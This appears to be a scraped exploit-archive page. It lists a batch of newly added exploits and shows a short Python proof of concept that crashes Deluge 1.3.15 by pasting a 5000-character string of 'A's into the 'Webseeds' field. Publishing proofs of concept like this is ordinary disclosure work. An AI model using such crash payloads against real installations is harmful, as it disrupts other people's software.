6d57564d7c
12 changes to exploits/shellcodes Deluge 1.3.15 - 'URL' Denial of Service (PoC) Deluge 1.3.15 - 'Webseeds' Denial of Service (PoC) macOS < 10.14.5 / iOS < 12.3 DFG JIT Compiler - 'HasIndexedProperty' Use-After-Free macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT Leaves Stack Variable Uninitialized macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - AIR Optimization Incorrectly Removes Assignment to Register macOS < 10.14.5 / iOS < 12.3 XNU - Wild-read due to bad cast in stf_ioctl macOS < 10.14.5 / iOS < 12.3 XNU - 'in6_pcbdetach' Stale Pointer Use-After-Free Moodle Jmol Filter 6.1 - Directory Traversal / Cross-Site Scripting TP-LINK TL-WR840N v5 00000005 - Cross-Site Scripting Oracle CTI Web Service - 'EBS_ASSET_HISTORY_OPERATIONS' XML Entity Injection WordPress Plugin WPGraphQL 0.2.3 - Multiple Vulnerabilities Brocade Network Advisor 14.4.1 - Unauthenticated Remote Code Execution
21 lines
No EOL
663 B
Python
Executable file
21 lines
No EOL
663 B
Python
Executable file
#Exploit Title: Deluge 1.3.15 - 'Webseeds' Denial of Service (PoC)
|
|
#Discovery by: Victor Mondragón
|
|
#Discovery Date: 2019-05-20
|
|
#Vendor Homepage: https://dev.deluge-torrent.org/
|
|
#Software Link: http://download.deluge-torrent.org/windows/deluge-1.3.15-win32-py2.7.exe
|
|
#Tested Version: 1.3.15
|
|
#Tested on: Windows 7 Service Pack 1 x64
|
|
|
|
#Steps to produce the crash:
|
|
#1.- Run python code: deluge_web.py
|
|
#2.- Open deluge_web.txt and copy content to clipboard
|
|
#3.- Open deluge.exe
|
|
#4.- Select "File" > "Create Torrent"
|
|
#5.- In "Webseeds" field paste Clipboard
|
|
#6.- Crashed
|
|
|
|
cod = "\x41" * 5000
|
|
|
|
f = open('deluge_web.txt', 'w')
|
|
f.write(cod)
|
|
f.close() |